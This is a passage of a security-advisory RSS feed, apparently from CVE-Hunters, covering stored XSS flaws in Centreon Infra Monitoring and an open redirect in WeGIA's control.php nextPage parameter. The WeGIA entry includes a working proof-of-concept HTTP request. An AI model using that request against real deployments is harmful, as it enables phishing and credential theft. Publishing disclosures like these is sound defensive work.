    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54893-centreon-web-all-versions-medium-severity-5120&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54893-centreon-web-all-versions-medium-severity-5120&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 14 Oct 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-62361</title>
        <link>https://www.cvehunters.com/p/cve-2025-62361/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-62361/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-62361-open-redirect-vulnerability-in-controlphp-endpoint-nextpage-parameter&amp;#34;&amp;gt;CVE-2025-62361: Open Redirect Vulnerability in &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; endpoint &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt; parameter
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-62361&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-62361&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;An Open Redirect vulnerability was identified in the &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application, specifically in the &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt; parameter (metodo=listarTodos nomeClasse=AlmoxarifeControle).&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;This vulnerability allows attackers to redirect users to arbitrary external domains, enabling phishing campaigns, malicious payload distribution, or user credential theft.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to validate and sanitize user input in the &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt; parameter.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;As a result, attackers can craft malicious URLs that redirect users to external websites outside the trusted domain, undermining user trust and enabling social engineering attacks.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-62361-open-redirect-vulnerability-in-controlphp-endpoint-nextpage-parameter&amp;#34;&amp;gt;CVE-2025-62361: Open Redirect Vulnerability in &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; endpoint &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt; parameter
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-62361&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-62361&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;An Open Redirect vulnerability was identified in the &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application, specifically in the &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt; parameter (metodo=listarTodos nomeClasse=AlmoxarifeControle).&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;This vulnerability allows attackers to redirect users to arbitrary external domains, enabling phishing campaigns, malicious payload distribution, or user credential theft.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to validate and sanitize user input in the &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt; parameter.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;As a result, attackers can craft malicious URLs that redirect users to external websites outside the trusted domain, undermining user trust and enabling social engineering attacks.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET /WeGIA/controle/control.php?metodo=listarTodos&amp;amp;amp;nomeClasse=AlmoxarifeControle&amp;amp;amp;nextPage=&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h3&amp;gt;&amp;lt;h4 id=&amp;#34;request&amp;#34;&amp;gt;Request:
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /WeGIA/controle/control.php?metodo=listarTodos&amp;amp;amp;nomeClasse=AlmoxarifeControle&amp;amp;amp;nextPage=https%3A%2F%2Fgoogle.com HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: sec.wegia.org:8000
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: https://sec.wegia.org:8000/WeGIA/html/geral/editar_permissoes.php
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: {COOKIE}
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The server accepts the crafted request and successfully redirects the victim to &amp;lt;code&amp;gt;https://google.com&amp;lt;/code&amp;gt; instead of restricting navigation to the application’s own domain.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Phishing: Attackers can trick users into visiting malicious sites that mimic legitimate ones.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Credential theft: Fake login pages can capture user credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malware distribution: Victims may be redirected to websites hosting malicious software.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputation damage: Users may lose trust in the Wegia platform if abused in phishing campaigns.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-m99c-77f2-gpjx&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-m99c-77f2-gpjx&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 14 Oct 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8429</title>
        <link>https://www.cvehunters.com/p/cve-2025-8429/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8429/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8429-cross-site-scripting-xss-stored-in-centreon-infra-monitoring&amp;#34;&amp;gt;CVE-2025-8429: Cross-Site Scripting (XSS) Stored in Centreon Infra Monitoring
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8429&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8429&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A user with elevated privileges can inject XSS in the ACL Action access configuration page&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Improper Neutralization of Input During Web Page Generation (XSS or &amp;#39;Cross-site Scripting&amp;#39;) vulnerability in Centreon Infra Monitoring (ACL Action access configuration modules) allows Stored XSS by users with elevated privileges. This issue affects Infra Monitoring: from 24.10.0 before 24.10.13, from 24.04.0 before 24.04.18, from 23.10.0 before 23.10.28.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8429-cross-site-scripting-xss-stored-in-centreon-infra-monitoring&amp;#34;&amp;gt;CVE-2025-8429: Cross-Site Scripting (XSS) Stored in Centreon Infra Monitoring
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8429&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8429&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A user with elevated privileges can inject XSS in the ACL Action access configuration page&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Improper Neutralization of Input During Web Page Generation (XSS or &amp;#39;Cross-site Scripting&amp;#39;) vulnerability in Centreon Infra Monitoring (ACL Action access configuration modules) allows Stored XSS by users with elevated privileges. This issue affects Infra Monitoring: from 24.10.0 before 24.10.13, from 24.04.0 before 24.04.18, from 23.10.0 before 23.10.28.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8429-centreon-web-all-versions-medium-severity-5119&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8429-centreon-web-all-versions-medium-severity-5119&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 14 Oct 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8430</title>
        <link>https://www.cvehunters.com/p/cve-2025-8430/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8430/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8430-cross-site-scripting-xss-stored-in-centreon-infra-monitoring&amp;#34;&amp;gt;CVE-2025-8430: Cross-Site Scripting (XSS) Stored in Centreon Infra Monitoring
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8430&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8430&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A user with elevated privileges can inject XSS in the Commands Connectors configuration configuration page.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Improper Neutralization of Input During Web Page Generation (XSS or &amp;#39;Cross-site Scripting&amp;#39;) vulnerability in Centreon Infra Monitoring (Commands Connectors configuration modules) allows Stored XSS by users with elevated privileges. This issue affects Infra Monitoring: from 24.10.0 before 24.10.13, from 24.04.0 before 24.04.18, from 23.10.0 before 23.10.28.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8430-cross-site-scripting-xss-stored-in-centreon-infra-monitoring&amp;#34;&amp;gt;CVE-2025-8430: Cross-Site Scripting (XSS) Stored in Centreon Infra Monitoring
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8430&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8430&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A user with elevated privileges can inject XSS in the Commands Connectors configuration configuration page.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Improper Neutralization of Input During Web Page Generation (XSS or &amp;#39;Cross-site Scripting&amp;#39;) vulnerability in Centreon Infra Monitoring (Commands Connectors configuration modules) allows Stored XSS by users with elevated privileges. This issue affects Infra Monitoring: from 24.10.0 before 24.10.13, from 24.04.0 before 24.04.18, from 23.10.0 before 23.10.28.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
